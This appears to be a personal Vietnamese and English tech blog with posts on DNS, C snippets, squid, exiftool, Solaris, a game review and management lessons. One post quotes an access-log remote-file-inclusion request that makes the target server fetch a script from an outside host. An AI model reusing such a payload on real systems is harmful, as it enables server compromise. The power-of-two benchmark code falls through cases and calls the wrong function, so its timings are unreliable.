May 6, 2010

Clear (Flush) Windows and Linux DNS cache

Set DNS to 8.8.8.8
My Network -> Property -> TCPIP -> Property -> DNS -> OK
Access the website
Change DNS back to the value it should be

Linux

Set DNS to 8.8.8.8


[vuhung@redmine-0.8.7]$ cat /etc/resolv.conf
; generated by /sbin/dhclient-script
nameserver 8.8.8.8
#nameserver 192.168.51.1

Access the website
Change DNS back to the value it should be

Nov 13, 2009

Bài học

Được và các bài học :
- Học được kỹ năng quản lý chung 20 người đồng thời làm team lead của 1 hay 2 dự án.
- Rút ra được những bài học quý giá về lãnh đạo và kinh nghiệm lãnh đạo người Việt.
- Một chút quyết đoán có tính độc tài (giúp cân bằng lại tính cách ôn hòa của cá nhân).
- Hiểu được rằng trong môi trường doanh nghiệp Việt Nam, mô hình quản lý "silent  
  lead" hay "vi vô vi" kiểu Lão Tử là bất khả thi.
- Hiểu ra được rằng muốn tồn tại thì phải hy sinh quyền lợi cá nhân *nhiều* hơn và 
   đặt cấp trên (có xu hướng bảo thủ và độc tài) lên trên.
- Các kỹ năng khác.
- Tác phong doanh nghiệp kiểu Việt Nam như: cách nói chuyện, cách viết email, 
   dùng từ (bằng tiếng Việt).
- Mô hình thiếu dân chủ không thể tồn tại, mặc dù trong doanh nghiệp.
- Một công ty muốn phải triển phải dựa trên nguyên tắc win-win và tôn trọng lẫn nhau.
- Học được cách maintain những conversation "vô bổ" (để giữ quan hệ, giải lao, xả stress).
- Một cuộc cách mạng phải trả giá bằng máu. Một sự thay đổi có tính cách mạng phải
 trả giá đắt. Giá đắt trong short term có thể tốt trong long term. Chọn fast decision
 chứ không phải "better decision" vì không có thời gian.
- Học được cách điều hòa với nhân viên và cấp trên.
- Xác định lại và kiên định với career map của mình: Quản lý kỹ thuật.

Mất:
- Stress quá nặng. Bị ức chế tới mức không thể kiểm chế và không hồi phục được
 trong một vài tháng.
- Mất tương lai: Chi phí cơ hội cho 6 tháng phí phạm không phải là nhỏ.
- Tài chính: Thu nhập thấp, bỏ không nhận các offer về options (vì quyết định chi sẻ)

Oct 28, 2009

Chia se mot so kinh nghiem phong van

Chia sẻ một số kinh nghiệm phỏng vấn của bản thân.

1. Đọc kỹ trước CV của ứng viên, đặc biệt tìm hiểu về những công nghệ lạ mà ứng viên đề cập trong CV.
Việc này cần chuẩn bị trước. HungNV dành khoảng 15-30 phút cho việc này.

2. Hỏi người quen ở các công ty cũ của ứng viên (optional, nếu có thế)

3. Mạo đầu phỏng vấn bằng cách giới thiệu vị trí người phỏng vấn (chính mình), giới thiệu công ty,
   giới thiệu vị trí, nhân sự mà công ty đang cần
(AI-T tuyển tràn lan, không có tiêu chí rõ ràng gây khó khăn cho người phỏng vấn)

4. Di dần theo các điểm chính trong CV (đã tổng kết ở phần 1.)

5. Hỏi sâu và một dự án mà ứng viên cảm thấy tâm đắc nhất, qua đó nhìn ra:
- Kỹ năng giải quyết vấn đề
- Kỹ năng quản lý
- Team work (khả năng giải quyễt xung đột trong team)
- Kỹ thuật nói chung (test, lập trình)
- Cách hiểu của ứng viên về quy trình phát triển phần mềm
- Khả năng chịu pressure của công việc


Nếu là sinh viên thì chỉ cần focus vào teamwork, các họat động ngoại khóa là đủ.

Aug 24, 2009

The Ubiquity of Evony

1. A New Perspective

I am an old school Age of Empire [the Conquer pack] (AOC) player and I have been playing this game for over 8 years. The one day I found Evony, which has a few nice features that AOC does not have:

1. The number of players is not limited.

2. Free (and technically free forever)

3. Evony is also a real-time strategy (RTS) game (I will explain later)

4. Can be played anywhere with just a browser.

2. Cutting-edge Technologies

The reason why Evony is Operation System independent is that, it uses the latest cutting-edge technology called Flash. This may sound obvious to most of the reader but this is the point that makes Evony unique. Network based games are hard to be developed and Flash makes it easier. Evony has made an excellent work on graphics. Do I need to compare Evony with the most popular among officers game called FarmTown?

The Internet doesn’t mean connectivity to everywhere. I still remember the day of TCP/IP dominated game era: We have to mess up with the router for port forwarding. With Evony, it is easy; all we need is just a browser (zero setup!) – Nothing can be simpler than that!

The “Map View” mode is very well done and I have never seen that kind of work in other text-based RTS games before: We can browse the map in the way we use Google map. Adding visualization to the game is the key factor that makes Evony easy to play and being unique.

3. In-game Booming and Rush

You are given 5000 resources of each kind (food, lumber, stone, iron and gold) and you have 7 days of protection, which means, you have 7 days of free booming without fear of being attacked from stronger users.

Of course, with 7 days, you can never be strong enough if decide going solo. You can buy items that make stronger but it will never be enough. And you have to find a good alliance to join. Otherwise, you won’t survive!

Army training in Evony goes the same way like other RTS games: We make a good economy, getting resources and training armies. The difference from Evony to AOC is that: Evony has only one kind of “army building”: The barrack. However, we can train dozen kinds of armies from it.

Fighting in Evony is not so visually: We choose a target, right-click it and choose “Attack”. A new window will popup letting we choose the armies. This is fine but after the attacked is launched, all we can do is WAITING! We can cancel the attack but we can not redirect (I mean set the targets to another coordinator). When the armies arrive the target, the fight instantly finished in a not-so-intuitive fashion way. AOC players like may ask: How to micro-management in Evony? Well, probably no, there is only macro-management in Evony.

4. Is This a True Real-Time Strategy Game?

Yes it is. However, to be precise, Evony belongs to a sub-genre of RTS game called Real-Time Tactics. Therefore, AOC players, who understand the meaning of the phase “Real-Time Strategy” in a misleading way, will find it strange at the first look. However, macro-management skills in AOC can be similarly applied here easily.

23/08/2009

Written by Nguyen Vu Hung

Email: vuhung16plus@gmail.com

Evony nickname: “VCF ksv9x” on server 30

Apr 8, 2009

Thống kê dung lượng kết nối Internet ở Việt Nam

Sơ đồ kết nối:
http://www.hn.is.uec.ac.jp/~vuhung/vietnam/thong-ke-internet-vietnam.html

Dung lượng kết nối:
http://www.thongkeinternet.vn/jsp/dungluong/dungluongthang.jsp

Mar 26, 2009

Nikkor AF Nikkor 85mm f/1.4D IF review

Ưu điểm:

* Sharpness là điểm nổi trội và output nhìn rất giống Nikon 85mm 1.2L và nhỉnh hơn một chút ít so với Nikkor 70-200 2.8 VR.
* f/1.4 nhanh (hơn hẳn f/1.8) khi chụp ở điều kiện thiếu sáng.
* Bokeh mịn nhìn giống kem mà Nikkor 50 1.4, 50 1.8, 85 1.8 không có. Đây là điểm nối bật của 85 1.4D so với 3 lens nói ở trên.
* f/1.4 nhanh hơn hẳn Nikkor 70-200 2.8 VR ở điều kiện thiếu sáng
* Chụp rất tốt khi trời sẩm tối (lúc này f/2.8 không thể lấy sáng cho dù tăng ISO 3200)
* Distortion thấp có thể bỏ qua.
* Vignetting hầu như không có và có thể bỏ qua ở f/1.4 và hoàn toàn không có ở f/2.
* Có thể thay thế macro lens nếu biết sử dụng hợp lý.

Nhược điểm:

* Không thể zoom và thiếu cơ động hơn hẳn người anh em Nikkor 70 200 2.8 VR
* Trở thành 135mm (hơi dài với crop body.
* AF không nhanh bằng Nikkor 70 200 2.8 VR (tuy nhiên AF đủ nhanh để chụp in-door sport trong điều kiện low light.
* Nhẹ và gọn hơn Nikkor 70 200 2.8 VR

Nov 14, 2008

Changing LS_COLORS

#Using bash 3.2.0 on CentOs 5.0

di=00 or di=01 means dar blue for folder in black background, which is quite hard to see. So I changed it to di=1;35;100( purple ).

Old:
LS_COLORS='no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=00;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31:*.zip=00;31:*.z=00;31:*.Z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31:*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*.tif=00;35:

New:

LS_COLORS='no=00:fi=00:di=1;35;100:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:'

Nov 12, 2008

A webalizer hack attempt

Found in httpd access_log 76.103.140.75 - - [12/Nov/2008:22:42:06 +0900] "GET /webalizer//tools/send_remin ders.php?includedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 40 4 356 "-" "libwww-perl/5.813"

Aug 12, 2008

Finding nearest pow to 2


/* gcc pow_opt.c */
/* http://jeffreystedfast.blogspot.com/search/label/algorithms */
#include 
#include 
#include 
typedef long uint32_t;
static uint32_t nearest_pow1(uint32_t num)
{    uint32_t n = 1;
    while (n < num)
        n <<= 1;    return n;
}static uint32_t nearest_pow2(uint32_t num)
{    uint32_t n = num > 0 ? num - 1 : 0;
    n |= n >> 1;
    n |= n >> 2;
    n |= n >> 4;
    n |= n >> 8;
    n |= n >> 16;
    n++;

    return n;
}

static uint32_t nearest_pow3(uint32_t num)
{
    int bit;

  __asm__("bsrl %1,%0\n\t" "jnz 1f\n\t" "movl $-1,%0\n" "1:": "=r"(bit):"rm"(num));

    return (1 << (bit + 1));
}


static uint32_t nearest_pow4(uint32_t num)
{
    uint32_t j, k;
    (j = num & 0xFFFF0000) || (j = num);
    (k = j & 0xFF00FF00) || (k = j);
    (j = k & 0xF0F0F0F0) || (j = k);
    (k = j & 0xCCCCCCCC) || (k = j);
    (j = k & 0xAAAAAAAA) || (j = k);
    return j << 1;
}

//A simple performance test might be:

int main(int argc, char **argv)
{
    uint32_t i, n = 0;

    uint32_t test_pow = atol(argv[1]);

    switch ( test_pow ) {
    case 1:
        for (i = 0; i < INT_MAX / 10; i++)
            n += nearest_pow1(i);
    case 2:
        for (i = 0; i < INT_MAX / 10; i++)
            n += nearest_pow2(i);
    case 3:
        for (i = 0; i < INT_MAX / 10; i++)
            n += nearest_pow2(i);
    case 4:
        for (i = 0; i < INT_MAX / 10; i++)
            n += nearest_pow2(i);

    }

    return n > 0 ? 1 : 0;
}

[vuhung@aoclife g++]$ for i in 1 2 3 4; do time ./a.out $i; done

real    0m43.297s
user    0m42.969s
sys     0m0.318s

real    0m20.455s
user    0m20.343s
sys     0m0.109s

real    0m13.653s
user    0m13.566s
sys     0m0.082s

real    0m6.817s
user    0m6.769s
sys     0m0.048s

Jul 23, 2008

Giám khảo thi ảnh Hà Nội cho xóm nhiếp ảnh

 
thang điểm 100.

1. SUNF - Hành tinh nhỏ Hà Nội 85/100.

Đối với những nhiếp ảnh gia đạt đạo, kỹ thuật và máy móc luôn là yếu tố thứ yếu.
Đây là quan điểm gây nhiều tranh cãi nhưng bộ ảnh "Hành tinh nhỏ Hà Nội" của bác Sunf
bắt người xem phải có một cái nhìn khách quan và thấu đáo hơn.

Bố cục, góc nhìn lạ. 
Tấm "Vinaconex - Trung Hòa Nhân Chính" có lẽ thành công nhất trong bộ,
nhìn giống như bom, một thông điệp cho sự phát triển ổn định của Hà Nội.

2. Vision II - Hồ Gươm 60/100.
Đây là đề tài cũ nên em nghĩ rất khó tìm được gì mới nếu tác giả chỉ đi một vòng quanh Hồ Gươm.
Ở năm 2008 này mà bác vẫn đi chụp phim - mà là đen trắng nhé - thì quả là em phục thật! 

3. Haitre - Những ngày trong nắng 80/100.
Cái hay của bộ ảnh này là sự tương phản giữa sự hiện đại và cổ điển. Nhà cổ và ô tô.
Ô tô và xe đạp. Và cả đám cưới phố cổ nữa, đúng không nhỉ? Có lẽ tác giả là người rất sành và rành Hà Nội!

4. m42 - Hồ Gươm 65/100.
Đây là đề tài cũ và khó chụp.
Ảnh có điểm nhấn nhưng chưa mô tả rõ được sự tương phản mà tác giả muốn mô tả.

5. ling - Hà Nội 85/100
Đây là bộ thứ 3 xóm nhà ta chụp Hồ Gươm. 
Như em nói rồi, khó chụp!
Nhưng bộ này thì đúng là tác giả có bỏ thời gian để chùm ảnh nằm trong một đề tài.
Tháp rùa, và người già? Có phải là sự già nua của Hà Nội không nhỉ?
Có lẽ không vì ở tấm ảnh cuối, một cô gái váy trắng đi xuyên qua Tháp rùa, đằng sau là bà cụ nhìn với theo. Thật ghen tị với tác giả về thời gian quý hiếm này. 

6. Haitre - Vỉa hè Hà Nội
Em chưa gặp bác HaiTre ở ngoài đời, nhưng mạn phép đoán là bác là người rất thích đem theo máy ảnh và ngồi vỉa hè theo phong cách lomo. 

Tấm 1( cái niêu ), tấm 2 ( quạt con cóc ), tấm 5( Honda ) rất thành công và được đặt theo thứ tự về thời gian. Tầm chụp hoa hồng và xe đạp em nghĩ là không hợp trong chủ đề hiện tại. 

Một băn khoăn của em: Xe đạp Trung Quốc hay Nhật, thời nào? 

7. hieubn - Hà Nội, Hà Nội 30/100. 
Như tác giả nói, đây là một bộ ảnh kỷ niệm của một cô gái Hà Nội.
Nó chưa làm nổi bật được nét "Hà Nội" của tên bộ ảnh. 
Sự can thiệp bằng phần mềm làm cho bộ ảnh nhìn cũ đi, hợp hơn với cái tên cổ "Hà Thành" em nghĩ chưa thành công.

8. minhdesigner - Tết Hà Nội 50/100
Tấm này làm em suy nghĩ quá: Chủ nhân chiếc xe đạp cọc cạch có bán được cành đào hay không?
http://xomnhiepanh.com/gallery.php?do=album_detail&album_id=341&id=3

9. 6unL - Nắng Hà Nội 70/100.
Một Hà Nội thu nhỏ ở đây: Bán rong, xe máy, dây điện, xe máy. Em tiếc lá thiếu ô tô.
http://xomnhiepanh.com/gallery.php?do=album_detail&album_id=397&id=1

Ba tấm còn lại em nghĩ chưa đạt, vì nắng Hà Nội gắt quá :D. 

10. dan - màu của Gươm 70/100.
Đây là đề tài cũ và khó chụp.
Em đánh giá rất cao trình đọc sáng của tác giả.

11. m42 - Quán Hà Nội 90/100.
Rất thành công trong việc bó hẹp đề tài. 
Bác có cái nhìn Việt Nam rất độc đáo mà người Việt Nam ở Việt Nam không hề có.

12. sonlam - Hà Nội mùa xuân 85/100.
- Không có bình luận.

Jun 25, 2008

Notepad++ Japanese.

1. Installl npp.5.0.beta.bin as usual
2. Download Japanese language pack.
Notepad++ 4.0.2 用日本語ロケール
http://homepage3.nifty.com/georgei/extension/notepadpp_jpl_v09.zip
3. Extract nativeLang.xml to npp.5.0.beta.bin\
4. Restart notepad++
5. From menu: Format -> UTF-8

Jun 23, 2008

ls awk to find filesizes


ls -lk | awk '{print $5;}'

[vuhung@aoclife src]$ ls -lk *c |  head
-rw-r--r-- 1 vuhung vuhung  23  4月  5 07:45 cairo-analysis-surface.c
-rw-r--r-- 1 vuhung vuhung   9  4月 12 06:07 cairo-arc.c
-rw-r--r-- 1 vuhung vuhung  13  4月  8 07:30 cairo-array.c
-rw-r--r-- 1 vuhung vuhung   3  4月  4 01:25 cairo-atomic.c
-rw-r--r-- 1 vuhung vuhung   5  4月  5 07:45 cairo-base85-stream.c
-rw-r--r-- 1 vuhung vuhung  52  4月  5 07:45 cairo-bentley-ottmann.c
-rw-r--r-- 1 vuhung vuhung  11  4月  5 07:45 cairo-cache.c
-rw-r--r-- 1 vuhung vuhung  66  4月  8 07:30 cairo-cff-subset.c
-rw-r--r-- 1 vuhung vuhung  23  4月  5 07:45 cairo-clip.c
-rw-r--r-- 1 vuhung vuhung   5  1月 18 08:09 cairo-color.c


[vuhung@aoclife src]$ ls -lk *c | awk '{print $5;}' | head
23
9
13
3
5
52
11
66
23
5


Jun 5, 2008

Trojan.SpyBuddy

/home/vuhung/public_html/tmp/photography/software/PixelGenius_PhotoKit_v1.2.4_for_Photoshop.rar: Trojan.SpyBuddy FOUND rm /home/vuhung/public_html/tmp/photography/software/PixelGenius_PhotoKit_v1.2.4_for_Photoshop.rar

Mar 28, 2008

Add GPS info to EXIF

Browser Google map and get



http://maps.google.com/?ie=UTF8&ll=35.675174,139.757635&spn=0.001181,0.002167&z=19



Pass the cordinators to exiftool:



C:\temp>exiftool -GPSLatitudeRef=N -GPSLongitudeRef=E -GPSAltitude=5 -GPSAltitudeRef="Above Sea Level" -overwrite_original -GPSLatitude=35.675174 -GPSLongitude=139.757635 -c "%.6f" "Yokoshima DSC_3562.jpg"



and we done.



batch process:



@echo off



echo adding gps ...



for %%nef in (dir /b *.NEF) DO exiftool -GPSLatitudeRef=N -GPSLongitudeRef=E -GPSAltitude=5 -GPSAltitudeRef="Above Sea Level" -overwrite_original -GPSLatitude=35.675174 -GPSLongitude=139.757635 -c "%.6f" %%nef



echo DONE



PAUSE




Or simply use this:

for %f in (*.JPG) DO exiftool -GPSLatitudeRef=N -GPSLongitudeRef=E -GPSAltitude=5 -GPSAltitudeRef="Above Sea Level" -overwrite_original -GPSLatitude=21.059562 -GPSLongitude=105.762752 -c "%.6f" %f

for %f in (*.NEF) DO exiftool -GPSLatitudeRef=N -GPSLongitudeRef=E -GPSAltitude=5 -GPSAltitudeRef="Above Sea Level" -overwrite_original -GPSLatitude=21.059562 -GPSLongitude=105.762752 -c "%.6f" %f

refs:


http://owl.phy.queensu.ca/~phil/exiftool/TagNames/GPS.html


http://www.carto.net/projects/photoTools/gpsPhoto/


http://hwat.sakura.ne.jp/hpod/200610/11-220000/


http://hwat.sakura.ne.jp/hpod/200609/28-200000/


http://en.wikipedia.org/wiki/Global_Positioning_System

Feb 26, 2008

squid configuration on Centos 5

cd /etc/squid/ htpasswd -c -b passwd squid_name squid_password /etc/init.d/squid start diff squid.conf squid.conf.2008-02-26.orig > /home/vuhung/work/squid.conf.diff.`date -I` 1564,1565c1564,1565 < # /usr/lib/squid/ncsa_auth < auth_param basic program /usr/lib/squid/ncsa_auth /etc/squid/passwd --- > # > # auth_param basic program /usr/libexec/ncsa_auth /usr/etc/passwd 1573c1573 < auth_param basic children 5 --- > # auth_param basic children 5 1586c1586 < auth_param basic realm Squid proxy-caching web server --- > # auth_param basic realm Squid proxy-caching web server 1597c1597 < auth_param basic credentialsttl 2 hours --- > # auth_param basic credentialsttl 2 hours 1769d1768 <> acl our_networks src 192.168.0.0/24 192.168.1.0/24 3214d3207 < cachemgr_passwd vuhung all 3444,3447d3436 < header_access X-Forwarded-For deny all < header_access Via deny all < header_access Cache-Control deny all <

squid configuration on Centos 5

1564,1565c1564,1565 < # /usr/lib/squid/ncsa_auth < auth_param basic program /usr/lib/squid/ncsa_auth /etc/squid/passwd --- > # > # auth_param basic program /usr/libexec/ncsa_auth /usr/etc/passwd 1573c1573 < auth_param basic children 5 --- > # auth_param basic children 5 1586c1586 < auth_param basic realm Squid proxy-caching web server --- > # auth_param basic realm Squid proxy-caching web server 1597c1597 < auth_param basic credentialsttl 2 hours --- > # auth_param basic credentialsttl 2 hours 1769d1768 < 2412,2415d2410 < acl password proxy_auth REQUIRED < http_access allow password < http_access deny all < 2461d2455 < follow_x_forwarded_for allow all 2528c2522 < acl our_networks src 192.168.11.0/24 192.168.1.0/24 --- > acl our_networks src 192.168.0.0/24 192.168.1.0/24 3214d3207 < cachemgr_passwd vuhung all 3444,3447d3436 < header_access X-Forwarded-For deny all < header_access Via deny all < header_access Cache-Control deny all < cd /etc/squid/ htpasswd -c -b passwd squid_name squid_password /etc/init.d/squid start diff squid.conf squid.conf.2008-02-26.orig > /home/vuhung/work/squid.conf.diff.`date -I`

Jan 16, 2008

Folding with vim, a cheat sheet

v|V, select zf or any other command ( fold in visual mode )
:20,101 fo[ld]: fold selected lines
zf/string: fold until the first match of "string" . 
:mkview : save folds. 
:loadview : load folds.
zf/string creates a fold from the cursor to string . Try within an "#ifdef" and "#endif".

zf#j  creates a fold from the cursor down  #  lines.
zj moves the cursor to the next fold.
zk moves the cursor to the previous fold.
zo opens a fold at the cursor.
zO opens all folds at the cursor.
zm increases the foldlevel by one.
zM closes all open folds.
zr decreases the foldlevel by one.
zR decreases the foldlevel to zero -- all folds will be open.
zd deletes the fold at the cursor.
zE deletes all folds.
[z move to start of open fold.
]z move to end of open fold.

Jan 7, 2008

A C pointer FAQ ( kind of ) [ as of now for me ]

Of course, pointers are not limited to ints. It's quite common to use pointers to other types, especially char. Here is the innards of the mystrcmp function we saw in a previous chapter, rewritten to use pointers. (mystrcmp, you may recall, compares two strings, character by character.)

 // p1, p2 point to the address of the first character in str1, str2 respectively
 char *p1 = &str1[0], *p2 = &str2[0];

 while(1)
  {
   // compare the values of str1[x], str[x] at the position x. Not equal
   if(*p1 != *p2)
    return *p1 - *p2;
   // we reached the end of both str1, str2 -> they are equal.
   if(*p1 == '\0' || *p2 == '\0')
    return 0;
   // p1++ and p2++ do the increment of p1 and p2.
   // i.e., the next characters in str1 ( str[x + 1] and str2 ( str2[ x + 1]
   p1++;
   p2++;
  }


As another example, here is the strcpy (string copy) loop from a previous chapter, rewritten to use pointers:

 char *dp = &dest[0], *sp = &src[0];
 while(*sp != '\0')
  // *dp++ means *(dp++), i.e., the value of the pointer next to dp.
  // to access the address of the next pointer of dp, use (*dp)++
  *dp++ = *sp++;
 *dp = '\0';

(One question that comes up is whether the expression *dp++ increments p or what it points to. The answer is that it increments p. To increment what p points to, you can use (*dp)++.) 

ref: http://www.eskimo.com/~scs/cclass/notes/sx10b.html

Os type detection with uname

[vuhung@test_make]$make vh
SunOs
[vuhung@test_make]$cat Makefile 
uname=$(shell uname)

ifeq ($(uname), Linux)
APP_OSTYPE = Linux
endif

ifeq ($(uname), SunOS)
APP_OSTYPE = SunOs
endif

vh:
        @echo $(APP_OSTYPE)

Dec 21, 2007

C pointer FAQ :D

Of course, pointers are not limited to ints. It's quite common to use pointers to other types, especially char. Here is the innards of the mystrcmp function we saw in a previous chapter, rewritten to use pointers. (mystrcmp, you may recall, compares two strings, character by character.)

    // p1, p2 point to the address of the first character in str1, str2 respectively
    char *p1 = &str1[0], *p2 = &str2[0];

    while(1)
        {
            // compare the values of str1[x], str[x] at the position x. Not equal
            if(*p1 != *p2)
                return *p1 - *p2;
            // we reached the end of both str1, str2 -> they are equal.
            if(*p1 == '\0' || *p2 == '\0')
                return 0;
            // p1++ and p2++ do the increment of p1 and p2.
            // i.e., the next characters in str1 ( str[x + 1] and str2 ( str2[ x + 1]
            p1++;
            p2++;
        }


As another example, here is the strcpy (string copy) loop from a previous chapter, rewritten to use pointers:

    char *dp = &dest[0], *sp = &src[0];
    while(*sp != '\0')
        // *dp++ means *(dp++), i.e., the value of the pointer next to dp.
        // to access the address of the next pointer of dp, use (*dp)++
        *dp++ = *sp++;
    *dp = '\0';

(One question that comes up is whether the expression *dp++ increments p or what it points to. The answer is that it increments p. To increment what p points to, you can use (*dp)++.)

ref: http://www.eskimo.com/~scs/cclass/notes/sx10b.html

Read and write png files bytes by bytes

#include 
#include 
#include 

#define WIDTH  (3)
#define HEIGHT (3)

int main()
{
    unsigned char   **image;                                // image[HEIGHT][WIDTH]の形式です
    int             i, j;

    image = (png_bytepp)malloc(HEIGHT * sizeof(png_bytep)); // 以下3行は2次元配列を確保します
    for (j = 0; j < HEIGHT; j++)
            image[j] = (png_bytep)malloc(WIDTH * sizeof(png_byte));


    for (i = 0; i < WIDTH; i++) {                           // 以下5行は単純なテストパターンを作ります
            for (j = 0; j < HEIGHT; j++) {
                    image[j][i] = (unsigned char)i;
            }
    }


    unsigned char *image2;

    image2 = (png_bytep) malloc( HEIGHT * WIDTH * sizeof(png_byte));

    for (i = 0; i < WIDTH; i++) {                           // 以下5行は単純なテストパターンを作ります
            for (j = 0; j < HEIGHT; j++) {
                    //printf("%d ", image[j][i]);
                    image2[j * WIDTH + i] = image[j][i];
                    printf("%d ", image2[j * WIDTH + i]);

            }
    }
    // TODO: write image2 to png stream
    // http://www.jah.ne.jp/~naoyuki/Writings/MngPng.html
    return 0;
}

Solaris 10: vim 7.1 color

Solaris 10 vim71 color
wget vim-7.1.tar.gz
tar xzvf vim-7.1.tar.gz
cd vim71
./configure --prefix=$HOME CC=gcc
make; make install
echo "syntax on" > .vimrc
export TERM=sun-color ( or echo "export TERM=sun-color" >> $HOME/.bash_profile

or TERM=xterm
or TERM=xtermc

Dec 20, 2007

Solars 10: Graphics Magick 1.10 installation

/bin/bash ../../libtool --silent   --mode=link g++  -D_REENTRANT -pthreads -version-info 1:3:0 -L/usr/sfw/lib -L/usr/lib -o libGraphicsMagick++.la -rpath /export/home/vuhung/lib Blob.lo BlobRef.lo CoderInfo.lo Color.lo Drawable.lo Exception.lo Functions.lo Geometry.lo Image.lo ImageRef.lo Montage.lo Options.lo Pixels.lo STL.lo Thread.lo TypeMetric.lo ../../magick/libGraphicsMagick.la
libtool: link: `/usr/sfw/lib/libstdc++.la' is not a valid libtool archive
make[3]: *** [libGraphicsMagick++.la] Error 1
make[3]: Leaving directory `/export/home/vuhung/usr/src/GraphicsMagick-1.1.10/Magick++/lib'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/export/home/vuhung/usr/src/GraphicsMagick-1.1.10/Magick++/lib'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/export/home/vuhung/usr/src/GraphicsMagick-1.1.10/Magick++'
make: *** [all-recursive] Error 1



232  ~/bin/tar xjvf GraphicsMagick-1.1.10.tar.bz2
233  cd GraphicsMagick-1.1.10
257  ./configure --prefix=$HOME CC=gcc CXX=g++  --enable-ccmalloc -without-perl
258  ~/bin/make
269  make install

bash-3.00# diff /usr/sfw/lib/libstdc++.la /usr/sfw/lib/libstdc++.la.original.2007-12-19.vh
1,32d0
< # libstdc++.la - a libtool library file
< # Generated by ltmain.sh - GNU libtool 1.4a-GCC3.0 (1.641.2.256 2001/05/28 20:09:07 with GCC-local changes)
< #
< # Please DO NOT delete this file!
< # It is necessary for linking the library.
<
< # The name that we can dlopen(3).
< dlname='libstdc++.so.6'
<
< # Names of this library.
< library_names='libstdc++.so.6.0.3 libstdc++.so.6 libstdc++.so'
<
< # The name of the static archive.
< old_library='libstdc++.a'
<
< # Libraries that this one depends upon.
< dependency_libs='-lc -lm -L/usr/sfw/lib -lgcc_s'
<
< # Version information for libstdc++.
< current=6
< age=0
< revision=3
<
< # Is this an already installed library?
< installed=yes
<
< # Files to dlopen/dlpreopen
< dlopen=''
< dlpreopen=''
<
< # Directory that this library needs to be installed in:
< libdir='/usr/sfw/lib'

bash-3.00# cat /etc/release
                     Solaris 10 6/06 s10s_u2wos_09a SPARC
         Copyright 2006 Sun Microsystems, Inc.  All Rights Reserved.
                      Use is subject to license terms.
                           Assembled 09 June 2006
                         Preinstall P/N 259-4616-01
                            Built 13 August 2006
bash-3.00# uname -a
SunOS soltest01 5.10 Generic_118833-22 sun4u sparc SUNW,Sun-Fire-V215
bash-3.00#
http://forum.java.sun.com/thread.jspa?threadID=5073150

Open Solaris 10 pkgrm pkgadd

-> pkgrm pkgname then -> pkgadd -d pkgnameFULL bash-3.00# pkgadd -d libgcc-3.4.6-sol10-sparc-local The following packages are available: 1 SMClgcc346 libgcc (sparc) 3.4.6 Select package(s) you wish to process (or 'all' to process all packages). (default: all) [?,??,q]: aa ERROR: Entry does not match available menu selection. Enter the number of the menu item you wish to select, or the token which is associated with the menu item, or a partial string which uniquely identifies the token for the menu item. Enter ?? to reprint the menu. Select package(s) you wish to process (or 'all' to process all packages). (default: all) [?,??,q]: all 中のパッケージインスタンス を処理中です。 libgcc(sparc) 3.4.6 FSF をパッケージのベースディレクトリとして使用します。 ## パッケージ情報を処理中です。 ## システム情報を処理中です。 5 個のパッケージパス名がすでに正しくインストールされています。 ## ディスク領域の要件を確認中です。 ## すでにインストール済みのパッケージとの重複を確認中です。 次のファイルは、すでにシステムにインストールされていますが、 現在、他 のパッケージが使用中です: /usr/local/lib/libg2c.so.0.0.0 /usr/local/lib/libgcc_s.so.1 /usr/local/lib/libstdc++.so.6.0.3 これらの重複しているファイルをインストールしますか [y,n,?,q] y ## setuid/setgid を行うプログラムを検査中です。 libgcc を としてインストール中です。 ## 1/1 部分をインストールしています。 /usr/local/lib/libg2c.so.0.0.0 /usr/local/lib/libgcc_s.so.1 /usr/local/lib/libstdc++.so.6.0.3 [ クラス を検査しています ] のインストールに成功しました。 bash-3.00# pkgadd -d gcc-3.4.6-sol10-sparc-local The following packages are available: 1 SMCgcc gcc (sparc) 3.4.6 Select package(s) you wish to process (or 'all' to process all packages). (default: all) [?,??,q]: all 中のパッケージインスタンス を処理中です。 gcc(sparc) 3.4.6 現在の管理上では、 パッケージに固有なインスタンスを作成する必 要があります。ただし、同じシステム上で 1 度にサポートできる最大数の パッケージインスがすでに存在しています。 システムは変更されていません。

Dec 11, 2007

Callback function

/** $g++ callback.c -o callback ./callback Item 4 http://en.wikipedia.org/wiki/Callback_%28computer_science%29 */ #include /* LIBRARY CODE */ int traverseWith(int array[], size_t length, int (*callback)(int index, int item, void *param), void *param) { int exitCode = 0; for (int i = 0; i < length; i++) { exitCode = callback(i, array[i], param); if (exitCode != 0) { break; } } return exitCode; } /* APPLICATION CODE */ int search (int index, int item, void *param) { if (item > 5) { *(int *)param = index; return 1; } else { return 0; } } main() { /* (in another function) */ int index; int found; int array[] = {1, 2, 3, 4, 7, 10, 12, 15 }; int length = 6; found = traverseWith(array, length, &search, &index); if (found) { printf("Item %d\n", index); } else { printf("Not found\n"); } }

Dec 9, 2007

pngcrush; png optimizer

